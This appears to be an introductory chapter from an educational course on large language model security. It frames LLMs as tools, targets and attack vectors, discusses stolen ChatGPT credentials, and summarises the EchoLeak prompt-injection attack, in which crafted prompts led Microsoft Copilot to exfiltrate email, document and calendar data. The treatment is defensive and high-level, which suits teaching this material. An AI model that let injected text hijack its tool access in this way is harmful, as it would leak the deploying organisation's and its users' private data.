Boo-AI — Master Artificial Intelligence by Building from Scratch

Introduction

Large Language Models represent a fundamentally new category of software system from a security perspective. Unlike traditional applications with well-defined input/output boundaries, LLMs accept natural language—an infinitely expressive input space—and produce natural language outputs that can encode arbitrary instructions, data, and behaviors.

This chapter examines the unique security challenges posed by LLMs, from their role as attack tools to their vulnerabilities as targets. The attack surface of an LLM deployment extends far beyond the model itself, encompassing the prompt engineering layer, retrieval systems, tool integrations, and the human users who interact with the system.

LLMs as Tools, Targets, and Vectors

What makes LLM security uniquely complex is that these models simultaneously occupy three security roles. As tools, they enhance the capabilities of both defenders and attackers. As targets, their training data, system prompts, and model weights are valuable assets to protect. As attack vectors, they can be manipulated to perform actions their operators never intended.

This triple role means that LLM security cannot be reduced to a single problem domain. Protecting an LLM deployment requires expertise in application security, data privacy, access control, and the unique properties of neural network systems. Traditional security frameworks must be extended to account for the probabilistic, non-deterministic nature of language model behavior.

LLM as tool: Attackers use LLMs to generate phishing content, write malware, automate reconnaissance, and scale social engineering campaigns
LLM as target: Adversaries attempt to extract training data, steal system prompts, exfiltrate confidential information processed by the model
LLM as vector: Through prompt injection, attackers hijack the LLM to execute actions in connected systems, turning the model into an unwitting accomplice

Key Insight: The most dangerous LLM attacks exploit the model as an attack vector. When an LLM has access to tools, APIs, or databases, a successful prompt injection can turn the model's legitimate capabilities against the organization that deployed it.

The Credential Black Market

By 2024, over 300,000 compromised ChatGPT credentials had been identified on dark web marketplaces. These credentials grant attackers access to users' conversation histories, which often contain sensitive corporate information, proprietary code, strategic plans, and personal data that users shared with the AI assistant without considering the security implications.

The credential theft problem highlights a fundamental challenge with LLM deployments: users treat AI assistants as trusted confidants, sharing information they would never put in an email or upload to an unsecured server. The conversational interface creates a false sense of privacy that attackers exploit by targeting the authentication layer rather than the model itself.

Organizations deploying LLMs must implement robust authentication practices, including multi-factor authentication, session management, and monitoring for anomalous usage patterns. They must also educate users about the risks of sharing sensitive information through AI interfaces, treating LLM conversations with the same security awareness applied to email and messaging platforms.

EchoLeak and Copilot Attacks

The EchoLeak attack demonstrated against Microsoft Copilot in 2024 illustrates the severity of LLM security vulnerabilities in enterprise deployments. By crafting specific prompts, researchers were able to extract sensitive information that Copilot had access to through its integration with Microsoft 365 services, including emails, documents, and calendar entries.

What made EchoLeak particularly alarming was that it exploited the very features that make enterprise AI assistants useful—their deep integration with organizational data. The same access that allows Copilot to summarize your emails and draft responses also creates a pathway for data exfiltration when the model is manipulated through carefully crafted prompts.

Why This Matters: Enterprise LLM deployments create a new class of insider threat. The AI assistant has broad access to organizational data, and if an attacker can control its behavior through prompt injection, the assistant becomes the most capable insider threat in the organization—one with access to everything and the ability to synthesize information across silos.

Data access scope: Enterprise LLMs often have broader data access than any individual employee, creating a high-value target
Trust boundary confusion: Users and systems treat LLM outputs as authoritative, making it difficult to distinguish legitimate from manipulated responses
Defense gap: Traditional security tools like DLP and CASB were not designed for natural language interfaces and struggle to detect LLM-based data exfiltration